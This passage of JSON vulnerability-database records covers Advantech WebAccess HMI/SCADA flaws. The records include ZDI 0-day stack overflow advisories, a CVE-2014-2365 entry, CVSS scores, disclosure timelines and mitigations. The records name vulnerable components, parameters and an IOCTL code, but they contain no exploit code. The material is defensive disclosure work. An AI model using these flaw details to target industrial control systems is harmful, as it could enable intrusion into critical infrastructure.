"db": "JVNDB", "id": "JVNDB-2016-001282" }, { "date": "2016-01-18T00:00:00", "db": "CNNVD", "id": "CNNVD-201601-325" }, { "date": "2016-01-15T03:59:14.483000", "db": "NVD", "id": "CVE-2016-0852" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2016-01-25T00:00:00", "db": "CNVD", "id": "CNVD-2016-00430" }, { "date": "2016-01-21T00:00:00", "db": "VULHUB", "id": "VHN-88362" }, { "date": "2016-01-14T00:00:00", "db": "BID", "id": "80745" }, { "date": "2016-01-26T00:00:00", "db": "JVNDB", "id": "JVNDB-2016-001282" }, { "date": "2016-01-18T00:00:00", "db": "CNNVD", "id": "CNNVD-201601-325" }, { "date": "2024-11-21T02:42:30.550000", "db": "NVD", "id": "CVE-2016-0852" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "CNNVD", "id": "CNNVD-201601-325" } ], "trust": 0.6 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Advantech WebAccess Security Restriction Bypass Vulnerability", "sources": [ { "db": "IVD", "id": "64d671ec-2351-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2016-00430" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "permissions and access control", "sources": [ { "db": "CNNVD", "id": "CNNVD-201601-325" } ], "trust": 0.6 } }
var-201708-1715
Vulnerability from variot
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within nvA1Media.ocx. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a stack-based buffer. An attacker can leverage this vulnerability to execute arbitrary code under the context of the process.
Show details on source website{ "affected_products": { "_id": null, "data": [ { "_id": null, "model": "webaccess", "scope": null, "trust": 0.7, "vendor": "advantech", "version": null } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-557" } ] }, "credits": { "_id": null, "data": "Anonymous", "sources": [ { "db": "ZDI", "id": "ZDI-17-557" } ], "trust": 0.7 }, "cvss": { "_id": null, "data": [ { "cvssV2": [ { "acInsufInfo": null, "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "ZDI", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "ZDI-17-557", "impactScore": 6.4, "integrityImpact": "PARTIAL", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "HIGH", "trust": 0.7, "userInteractionRequired": null, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "ZDI", "id": "ZDI-17-557", "trust": 0.7, "value": "HIGH" } ] } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-557" } ] }, "description": { "_id": null, "data": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within nvA1Media.ocx. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a stack-based buffer. An attacker can leverage this vulnerability to execute arbitrary code under the context of the process.", "sources": [ { "db": "ZDI", "id": "ZDI-17-557" } ], "trust": 0.7 }, "external_ids": { "_id": null, "data": [ { "db": "ZDI_CAN", "id": "ZDI-CAN-4105", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-17-557", "trust": 0.7 } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-557" } ] }, "id": "VAR-201708-1715", "iot": { "_id": null, "data": true, "sources": [ { "db": "VARIoT devices database", "id": null } ], "trust": 0.41739574 }, "last_update_date": "2022-05-17T02:03:14.187000Z", "patch": { "_id": null, "data": [ { "title": "This vulnerability is being disclosed publicly without a patch in accordance with the ZDI 120 day deadline.11/08/2016, 11/09/2016, 11/10/2016 and 11/15/2016 - ZDI disclosed the reports, 44 in all, to ICS-CERT11/09/2016 - The vendor acknowledged receipt of the report through ICS-CERT and ICS-CERT provided ICS-VU-71410304/27/2017 - ICS-CERT notified ZDI these might be fixed in the latest version and asked would ZDI re-test05/03/2017 - ZDI replied that we cannot do the testing for AdvantechICS-CERT did not respond06/23/2017 - ZDI wrote to ICS-CERT requesting any available update07/31/2017 - ZDI wrote to ICS-CERT requesting any available update08/01/2017 - ZDI wrote to ICS-CERT advising of the intent to 0-day-- Mitigation:The killbit can be set on this control to disable scripting within Internet Explorer by modifying the data value of the Compatibility Flags DWORD within the following location in the registry:HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Internet Explorer\\ActiveX Compatibility\\E19E79EC-F62E-40A0-952D-E49AEC7BEC2FIf the Compatibility Flags value is set to 0x00000400, the control can no longer be instantiated inside the browser.For more information, please see: ", "trust": 0.7, "url": "http://support.microsoft.com/kb/240797" } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-557" } ] }, "references": { "_id": null, "data": [ { "trust": 0.7, "url": "http://support.microsoft.com/kb/240797" } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-557" } ] }, "sources": { "_id": null, "data": [ { "db": "ZDI", "id": "ZDI-17-557", "ident": null } ] }, "sources_release_date": { "_id": null, "data": [ { "date": "2017-08-07T00:00:00", "db": "ZDI", "id": "ZDI-17-557", "ident": null } ] }, "sources_update_date": { "_id": null, "data": [ { "date": "2017-08-07T00:00:00", "db": "ZDI", "id": "ZDI-17-557", "ident": null } ] }, "title": { "_id": null, "data": "(0Day) Advantech WebAccess nvA1Media Connect MediaPassword Stack-based Buffer Overflow Remote Code Execution Vulnerability", "sources": [ { "db": "ZDI", "id": "ZDI-17-557" } ], "trust": 0.7 } }
var-201602-0474
Vulnerability from variot
This vulnerability allows remote attackers to execute arbitrary code on vulnerable instances of Advantech WebAccess. Authentication is not required to exploit this vulnerability.The specific flaw exists within the implementation of the 0x13C80 IOCTL in the BwOpcTool subsystem. A stack-based buffer overflow vulnerability exists in a call to strcpy using the NodeName parameter. An attacker can use this vulnerability to execute arbitrary code in the context of an administrator of the system.
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", "affected_products": { "@id": "https://www.variotdbs.pl/ref/affected_products" }, "configurations": { "@id": "https://www.variotdbs.pl/ref/configurations" }, "credits": { "@id": "https://www.variotdbs.pl/ref/credits" }, "cvss": { "@id": "https://www.variotdbs.pl/ref/cvss/" }, "description": { "@id": "https://www.variotdbs.pl/ref/description/" }, "exploit_availability": { "@id": "https://www.variotdbs.pl/ref/exploit_availability/" }, "external_ids": { "@id": "https://www.variotdbs.pl/ref/external_ids/" }, "iot": { "@id": "https://www.variotdbs.pl/ref/iot/" }, "iot_taxonomy": { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/" }, "patch": { "@id": "https://www.variotdbs.pl/ref/patch/" }, "problemtype_data": { "@id": "https://www.variotdbs.pl/ref/problemtype_data/" }, "references": { "@id": "https://www.variotdbs.pl/ref/references/" }, "sources": { "@id": "https://www.variotdbs.pl/ref/sources/" }, "sources_release_date": { "@id": "https://www.variotdbs.pl/ref/sources_release_date/" }, "sources_update_date": { "@id": "https://www.variotdbs.pl/ref/sources_update_date/" }, "threat_type": { "@id": "https://www.variotdbs.pl/ref/threat_type/" }, "title": { "@id": "https://www.variotdbs.pl/ref/title/" }, "type": { "@id": "https://www.variotdbs.pl/ref/type/" } }, "@id": "https://www.variotdbs.pl/vuln/VAR-201602-0474", "affected_products": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "model": "webaccess", "scope": null, "trust": 0.7, "vendor": "advantech", "version": null } ], "sources": [ { "db": "ZDI", "id": "ZDI-16-144" } ] }, "credits": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "Anonymous", "sources": [ { "db": "ZDI", "id": "ZDI-16-144" } ], "trust": 0.7 }, "cvss": { "@context": { "cvssV2": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2" }, "cvssV3": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#" }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/" }, "severity": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#" }, "@id": "https://www.variotdbs.pl/ref/cvss/severity" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" }, "@id": "https://www.variotdbs.pl/ref/sources" } }, "data": [ { "cvssV2": [ { "acInsufInfo": null, "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "author": "ZDI", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "exploitabilityScore": 8.6, "id": "ZDI-16-144", "impactScore": 10.0, "integrityImpact": "COMPLETE", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "HIGH", "trust": 0.7, "userInteractionRequired": null, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "ZDI", "id": "ZDI-16-144", "trust": 0.7, "value": "HIGH" } ] } ], "sources": [ { "db": "ZDI", "id": "ZDI-16-144" } ] }, "description": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable instances of Advantech WebAccess. Authentication is not required to exploit this vulnerability.The specific flaw exists within the implementation of the 0x13C80 IOCTL in the BwOpcTool subsystem. A stack-based buffer overflow vulnerability exists in a call to strcpy using the NodeName parameter. An attacker can use this vulnerability to execute arbitrary code in the context of an administrator of the system.", "sources": [ { "db": "ZDI", "id": "ZDI-16-144" } ], "trust": 0.7 }, "external_ids": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/external_ids#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "db": "ZDI_CAN", "id": "ZDI-CAN-3157", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-16-144", "trust": 0.7 } ], "sources": [ { "db": "ZDI", "id": "ZDI-16-144" } ] }, "id": "VAR-201602-0474", "iot": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/iot#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": true, "sources": [ { "db": "VARIoT devices database", "id": null } ], "trust": 0.41739574 }, "last_update_date": "2022-05-17T01:46:30.426000Z", "patch": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/patch#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "title": "This vulnerability is being disclosed publicly without a patch in accordance with the ZDI vulnerability disclosure policy on lack of vendor response.09/15/2015 - 09/17/2015 - ZDI disclosed reports to ICS-CERT (+1 more on 9/29/2015).09/15/2015 and 09/17/2015 - ICS-CERT acknowledged with a tracking number.10/06/2015 - ICS-CERT advised ZDI that the vendor was working on a patch tentatively planned for November.11/10/2015 - ICS-CERT advised ZDI that this patch/next version would be released in early December.12/14/2015 - ZDI asked ICS-CERT if a patch was available. 12/15/2015 - ICS-CERT advised ZDI that a patch release was expected \"any day now.\"12/15/2015 - ICS-CERT inquired with the vendor about the patch.01/06/2016 - ICS-CERT advised ZDI that the vendor released WebAccess 8.1.01/06/2016 - ZDI asked ICS-CERT what fixes are supposed to be in the build. 01/13/2016 - ICS-CERT provided ZDI with a written draft advisory.01/15/2016 - ICS-CERT published an advisory.01/15/2016 - ZDI asked ICS-CERT to confirm CVE mapping.01/22/2016 and 01/26/2016 - ZDI discussed with ICS-CERT by phone the concern that the patch seemed incomplete.01/27/2015 - ZDI concluded that this cases is not patched.02/01/2015 - ZDI notified ICS-CERT intent to release a 0-day advisory02/02/2015 - ZDI advisory released.-- Mitigation:Given the nature of the vulnerability, the only salient mitigation strategy is to restrict interaction with the service to trusted machines. Only the clients and servers that have a legitimate procedural relationship with the service should be permitted to communicate with it. This could be accomplished in a number of ways, most notably with firewall rules/whitelisting. These features are available in the native Windows Firewall, as described in and numerous other Microsoft Knowledge Base articles.", "trust": 0.7, "url": "http://technet.microsoft.com/en-us/library/cc725770%28ws.10%29.aspx" } ], "sources": [ { "db": "ZDI", "id": "ZDI-16-144" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 0.7, "url": "http://technet.microsoft.com/en-us/library/cc725770%28ws.10%29.aspx" } ], "sources": [ { "db": "ZDI", "id": "ZDI-16-144" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "ZDI", "id": "ZDI-16-144" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2016-02-05T00:00:00", "db": "ZDI", "id": "ZDI-16-144" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2016-02-05T00:00:00", "db": "ZDI", "id": "ZDI-16-144" } ] }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "(0Day) Advantech WebAccess webvrpcs Service BwWebSvc.dll NodeName strcpy Stack-Based Buffer Overflow Remote Code Execution Vulnerability", "sources": [ { "db": "ZDI", "id": "ZDI-16-144" } ], "trust": 0.7 } }
var-201708-1696
Vulnerability from variot
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within nvA1Media.ocx. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a stack-based buffer. An attacker can leverage this vulnerability to execute arbitrary code under the context of the process.
Show details on source website{ "affected_products": { "_id": null, "data": [ { "_id": null, "model": "webaccess", "scope": null, "trust": 0.7, "vendor": "advantech", "version": null } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-538" } ] }, "credits": { "_id": null, "data": "Anonymous", "sources": [ { "db": "ZDI", "id": "ZDI-17-538" } ], "trust": 0.7 }, "cvss": { "_id": null, "data": [ { "cvssV2": [ { "acInsufInfo": null, "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "author": "ZDI", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 10.0, "id": "ZDI-17-538", "impactScore": 6.4, "integrityImpact": "PARTIAL", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "HIGH", "trust": 0.7, "userInteractionRequired": null, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "ZDI", "id": "ZDI-17-538", "trust": 0.7, "value": "HIGH" } ] } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-538" } ] }, "description": { "_id": null, "data": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within nvA1Media.ocx. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a stack-based buffer. An attacker can leverage this vulnerability to execute arbitrary code under the context of the process.", "sources": [ { "db": "ZDI", "id": "ZDI-17-538" } ], "trust": 0.7 }, "external_ids": { "_id": null, "data": [ { "db": "ZDI_CAN", "id": "ZDI-CAN-4104", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-17-538", "trust": 0.7 } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-538" } ] }, "id": "VAR-201708-1696", "iot": { "_id": null, "data": true, "sources": [ { "db": "VARIoT devices database", "id": null } ], "trust": 0.41739574 }, "last_update_date": "2022-05-17T02:01:04.691000Z", "patch": { "_id": null, "data": [ { "title": "This vulnerability is being disclosed publicly without a patch in accordance with the ZDI 120 day deadline.11/08/2016, 11/09/2016, 11/10/2016 and 11/15/2016 - ZDI disclosed the reports, 44 in all, to ICS-CERT11/09/2016 - The vendor acknowledged receipt of the report through ICS-CERT and ICS-CERT provided ICS-VU-71410304/27/2017 - ICS-CERT notified ZDI these might be fixed in the latest version and asked would ZDI re-test05/03/2017 - ZDI replied that we cannot do the testing for AdvantechICS-CERT did not respond06/23/2017 - ZDI wrote to ICS-CERT requesting any available update07/31/2017 - ZDI wrote to ICS-CERT requesting any available update08/01/2017 - ZDI wrote to ICS-CERT advising of the intent to 0-day-- Mitigation:The killbit can be set on this control to disable scripting within Internet Explorer by modifying the data value of the Compatibility Flags DWORD within the following location in the registry:HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Internet Explorer\\ActiveX Compatibility\\E19E79EC-F62E-40A0-952D-E49AEC7BEC2FIf the Compatibility Flags value is set to 0x00000400, the control can no longer be instantiated inside the browser.For more information, please see: ", "trust": 0.7, "url": "http://support.microsoft.com/kb/240797" } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-538" } ] }, "references": { "_id": null, "data": [ { "trust": 0.7, "url": "http://support.microsoft.com/kb/240797" } ], "sources": [ { "db": "ZDI", "id": "ZDI-17-538" } ] }, "sources": { "_id": null, "data": [ { "db": "ZDI", "id": "ZDI-17-538", "ident": null } ] }, "sources_release_date": { "_id": null, "data": [ { "date": "2017-08-07T00:00:00", "db": "ZDI", "id": "ZDI-17-538", "ident": null } ] }, "sources_update_date": { "_id": null, "data": [ { "date": "2017-08-07T00:00:00", "db": "ZDI", "id": "ZDI-17-538", "ident": null } ] }, "title": { "_id": null, "data": "(0Day) Advantech WebAccess nvA1Media Connect MediaUsername Stack-based Buffer Overflow Remote Code Execution Vulnerability", "sources": [ { "db": "ZDI", "id": "ZDI-17-538" } ], "trust": 0.7 } }
var-201407-0234
Vulnerability from variot
Unspecified vulnerability in Advantech WebAccess before 7.2 allows remote authenticated users to create or delete arbitrary files via unknown vectors. Authentication is not required to exploit this vulnerability. The specific flaw exists within the gmicons.asp functionality. An attacker may leverage this to run arbitrary code in the context of the WebAccess service. WebAccess HMI/SCADA software provides remote control and management, allowing users to easily view and configure automation equipment in facility management systems, power stations and building automation systems. Advantech WebAccess is prone to a remote code-execution vulnerability. Failed exploit attempts will likely cause a denial-of-service condition. Advantech WebAccess 7.1 and prior are vulnerable. Advantech WebAccess is a browser-based HMI/SCADA software developed by Advantech. There are security vulnerabilities in Advantech WebAccess 7.1 and earlier versions
Show details on source website{ "affected_products": { "_id": null, "data": [ { "_id": null, "model": "webaccess", "scope": "eq", "trust": 1.6, "vendor": "advantech", "version": "7.0" }, { "_id": null, "model": "webaccess", "scope": "eq", "trust": 1.6, "vendor": "advantech", "version": "5.0" }, { "_id": null, "model": "webaccess", "scope": "eq", "trust": 1.6, "vendor": "advantech", "version": "6.0" }, { "_id": null, "model": "webaccess", "scope": "lt", "trust": 1.4, "vendor": "advantech", "version": "7.2" }, { "_id": null, "model": "webaccess", "scope": "lte", "trust": 1.0, "vendor": "advantech", "version": "7.1" }, { "_id": null, "model": "webaccess", "scope": null, "trust": 0.7, "vendor": "advantech", "version": null }, { "_id": null, "model": "webaccess", "scope": "eq", "trust": 0.6, "vendor": "advantech", "version": "7.1" }, { "_id": null, "model": null, "scope": "eq", "trust": 0.4, "vendor": "advantech webaccess", "version": "5.0" }, { "_id": null, "model": null, "scope": "eq", "trust": 0.4, "vendor": "advantech webaccess", "version": "6.0" }, { "_id": null, "model": null, "scope": "eq", "trust": 0.4, "vendor": "advantech webaccess", "version": "7.0" }, { "_id": null, "model": null, "scope": "eq", "trust": 0.4, "vendor": "advantech webaccess", "version": "*" } ], "sources": [ { "db": "IVD", "id": "7d71e152-463f-11e9-af14-000c29342cb1" }, { "db": "IVD", "id": "e482e66e-2351-11e6-abef-000c29c66e3d" }, { "db": "ZDI", "id": "ZDI-14-251" }, { "db": "CNVD", "id": "CNVD-2014-04462" }, { "db": "JVNDB", "id": "JVNDB-2014-003488" }, { "db": "CNNVD", "id": "CNNVD-201407-477" }, { "db": "NVD", "id": "CVE-2014-2365" } ] }, "configurations": { "_id": null, "data": [ { "CVE_data_version": "4.0", "nodes": [ { "cpe_match": [ { "cpe22Uri": "cpe:/a:advantech:advantech_webaccess", "vulnerable": true } ], "operator": "OR" } ] } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2014-003488" } ] }, "credits": { "_id": null, "data": "John Leitch", "sources": [ { "db": "ZDI", "id": "ZDI-14-251" } ], "trust": 0.7 }, "cve": "CVE-2014-2365", "cvss": { "_id": null, "data": [ { "cvssV2": [ { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "author": "nvd@nist.gov", "availabilityImpact": "PARTIAL", "baseScore": 5.5, "confidentialityImpact": "NONE", "exploitabilityScore": 8.0, "id": "CVE-2014-2365", "impactScore": 4.9, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 1.8, "vectorString": "AV:N/AC:L/Au:S/C:N/I:P/A:P", "version": "2.0" }, { "acInsufInfo": null, "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "author": "ZDI", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "exploitabilityScore": 8.0, "id": "CVE-2014-2365", "impactScore": 6.4, "integrityImpact": "PARTIAL", "obtainAllPrivilege": null, "obtainOtherPrivilege": null, "obtainUserPrivilege": null, "severity": "MEDIUM", "trust": 0.7, "userInteractionRequired": null, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "author": "CNVD", "availabilityImpact": "PARTIAL", "baseScore": 5.5, "confidentialityImpact": "NONE", "exploitabilityScore": 8.0, "id": "CNVD-2014-04462", "impactScore": 4.9, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 0.6, "vectorString": "AV:N/AC:L/Au:S/C:N/I:P/A:P", "version": "2.0" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "author": "IVD", "availabilityImpact": "PARTIAL", "baseScore": 5.5, "confidentialityImpact": "NONE", "exploitabilityScore": 8.0, "id": "7d71e152-463f-11e9-af14-000c29342cb1", "impactScore": 4.9, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 0.2, "vectorString": "AV:N/AC:L/Au:S/C:N/I:P/A:P", "version": "2.9 [IVD]" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "author": "IVD", "availabilityImpact": "PARTIAL", "baseScore": 5.5, "confidentialityImpact": "NONE", "exploitabilityScore": 8.0, "id": "e482e66e-2351-11e6-abef-000c29c66e3d", "impactScore": 4.9, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 0.2, "vectorString": "AV:N/AC:L/Au:S/C:N/I:P/A:P", "version": "2.9 [IVD]" }, { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "author": "VULHUB", "availabilityImpact": "PARTIAL", "baseScore": 5.5, "confidentialityImpact": "NONE", "exploitabilityScore": 8.0, "id": "VHN-70304", "impactScore": 4.9, "integrityImpact": "PARTIAL", "severity": "MEDIUM", "trust": 0.1, "vectorString": "AV:N/AC:L/AU:S/C:N/I:P/A:P", "version": "2.0" } ], "cvssV3": [], "severity": [ { "author": "nvd@nist.gov", "id": "CVE-2014-2365", "trust": 1.0, "value": "MEDIUM" }, { "author": "NVD", "id": "CVE-2014-2365", "trust": 0.8, "value": "Medium" }, { "author": "ZDI", "id": "CVE-2014-2365", "trust": 0.7, "value": "MEDIUM" }, { "author": "CNVD", "id": "CNVD-2014-04462", "trust": 0.6, "value": "MEDIUM" }, { "author": "CNNVD", "id": "CNNVD-201407-477", "trust": 0.6, "value": "MEDIUM" }, { "author": "IVD", "id": "7d71e152-463f-11e9-af14-000c29342cb1", "trust": 0.2, "value": "MEDIUM" }, { "author": "IVD", "id": "e482e66e-2351-11e6-abef-000c29c66e3d", "trust": 0.2, "value": "MEDIUM" }, { "author": "VULHUB", "id": "VHN-70304", "trust": 0.1, "value": "MEDIUM" } ] } ], "sources": [ { "db": "IVD", "id": "7d71e152-463f-11e9-af14-000c29342cb1" }, { "db": "IVD", "id": "e482e66e-2351-11e6-abef-000c29c66e3d" }, { "db": "ZDI", "id": "ZDI-14-251" }, { "db": "CNVD", "id": "CNVD-2014-04462" }, { "db": "VULHUB", "id": "VHN-70304" }, { "db": "JVNDB", "id": "JVNDB-2014-003488" }, { "db": "CNNVD", "id": "CNNVD-201407-477" }, { "db": "NVD", "id": "CVE-2014-2365" } ] }, "description": { "_id": null, "data": "Unspecified vulnerability in Advantech WebAccess before 7.2 allows remote authenticated users to create or delete arbitrary files via unknown vectors. Authentication is not required to exploit this vulnerability. The specific flaw exists within the gmicons.asp functionality. An attacker may leverage this to run arbitrary code in the context of the WebAccess service. WebAccess HMI/SCADA software provides remote control and management, allowing users to easily view and configure automation equipment in facility management systems, power stations and building automation systems. Advantech WebAccess is prone to a remote code-execution vulnerability. Failed exploit attempts will likely cause a denial-of-service condition. \nAdvantech WebAccess 7.1 and prior are vulnerable. Advantech WebAccess is a browser-based HMI/SCADA software developed by Advantech. There are security vulnerabilities in Advantech WebAccess 7.1 and earlier versions", "sources": [ { "db": "NVD", "id": "CVE-2014-2365" }, { "db": "JVNDB", "id": "JVNDB-2014-003488" }, { "db": "ZDI", "id": "ZDI-14-251" }, { "db": "CNVD", "id": "CNVD-2014-04462" }, { "db": "BID", "id": "68718" }, { "db": "IVD", "id": "7d71e152-463f-11e9-af14-000c29342cb1" }, { "db": "IVD", "id": "e482e66e-2351-11e6-abef-000c29c66e3d" }, { "db": "VULHUB", "id": "VHN-70304" } ], "trust": 3.51 }, "external_ids": { "_id": null, "data": [ { "db": "NVD", "id": "CVE-2014-2365", "trust": 4.5 }, { "db": "ICS CERT", "id": "ICSA-14-198-02", "trust": 2.5 }, { "db": "CNNVD", "id": "CNNVD-201407-477", "trust": 1.1 }, { "db": "CNVD", "id": "CNVD-2014-04462", "trust": 1.0 }, { "db": "BID", "id": "68718", "trust": 1.0 }, { "db": "JVNDB", "id": "JVNDB-2014-003488", "trust": 0.8 }, { "db": "ZDI_CAN", "id": "ZDI-CAN-2086", "trust": 0.7 }, { "db": "ZDI", "id": "ZDI-14-251", "trust": 0.7 }, { "db": "IVD", "id": "7D71E152-463F-11E9-AF14-000C29342CB1", "trust": 0.2 }, { "db": "IVD", "id": "E482E66E-2351-11E6-ABEF-000C29C66E3D", "trust": 0.2 }, { "db": "VULHUB", "id": "VHN-70304", "trust": 0.1 } ], "sources": [ { "db": "IVD", "id": "7d71e152-463f-11e9-af14-000c29342cb1" }, { "db": "IVD", "id": "e482e66e-2351-11e6-abef-000c29c66e3d" }, { "db": "ZDI", "id": "ZDI-14-251" }, { "db": "CNVD", "id": "CNVD-2014-04462" }, { "db": "VULHUB", "id": "VHN-70304" }, { "db": "BID", "id": "68718" }, { "db": "JVNDB", "id": "JVNDB-2014-003488" }, { "db": "CNNVD", "id": "CNNVD-201407-477" }, { "db": "NVD", "id": "CVE-2014-2365" } ] }, "id": "VAR-201407-0234", "iot": { "_id": null, "data": true, "sources": [ { "db": "IVD", "id": "7d71e152-463f-11e9-af14-000c29342cb1" }, { "db": "IVD", "id": "e482e66e-2351-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2014-04462" }, { "db": "VULHUB", "id": "VHN-70304" } ], "trust": 1.53470696 }, "iot_taxonomy": { "_id": null, "data": [ { "category": [ "ICS" ], "sub_category": null, "trust": 1.0 } ], "sources": [ { "db": "IVD", "id": "7d71e152-463f-11e9-af14-000c29342cb1" }, { "db": "IVD", "id": "e482e66e-2351-11e6-abef-000c29c66e3d" }, { "db": "CNVD", "id": "CNVD-2014-04462" } ] }, "last_update_date": "2024-11-23T22:02:04.971000Z", "patch": { "_id": null, "data": [ { "title": "Downloads ::: WebAccess Software", "trust": 0.8, "url": "http://webaccess.advantech.com/downloads.php?item=software" }, { "title": "Advantech WebAccess", "trust": 0.8, "url": "http://webaccess.advantech.com/" }, { "title": "Advantech has issued an update to correct this vulnerability.", "trust": 0.7, "url": "http://ics-cert.us-cert.gov/advisories/ICSA-14-198-02" }, { "title": "Patch for Advantech WebAccess Remote Code Execution Vulnerability", "trust": 0.6, "url": "https://www.cnvd.org.cn/patchInfo/show/47712" }, { "title": 